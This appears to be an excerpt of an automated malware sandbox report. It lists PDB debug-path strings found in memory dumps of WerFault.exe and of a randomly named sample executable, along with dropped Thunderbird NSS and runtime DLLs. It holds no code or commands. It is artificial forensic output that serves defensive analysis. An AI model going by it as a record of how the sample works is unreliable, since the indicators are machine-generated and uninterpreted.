Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb8 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.268737897.00000000028E0000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.390319982.000000000324D000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.500274963.0000000002F6D000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb' source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdbfQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb`X source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb. source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb- source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, vcruntime140[1].dll.1.dr
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbA source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdbc source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.462570750.00000000029F9000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbr source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdbW source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb( source: WerFault.exe, 00000020.00000003.461640685.00000000044C6000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdbR source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: bcrypt.pdb@ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbx source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb! source: WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: propsys.pdbU source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: version.pdbF source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: aCnjrFnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000020.00000002.482493082.0000000002632000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdbM source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbx source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb~ source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbW source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb&XCG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdba source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb\XEG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdbd source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbPXqG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbY source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: version.pdbR source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbBXgG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbO source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb4 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbo source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb} source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb"Q source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbL source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbJ source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdbt source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb? source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: schannel.pdbtQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbT source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb9 source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb, source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000020.00000003.462921326.00000000029F3000.00000004.00000001.sdmp
Source: Binary string: wintrust.pdb: source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdbi source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb. source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr
Source: Binary string: gdiplus.pdbp source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: version.pdb+ source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: shell32.pdblX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdbS source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb! source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb- source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbV source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: combase.pdb? source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb?A source: WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb< source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: shlwapi.pdb2 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb9 source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbQ source: WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb$ source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb- source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb9 source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr
Source: Binary string: dwmapi.pdbxXiG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
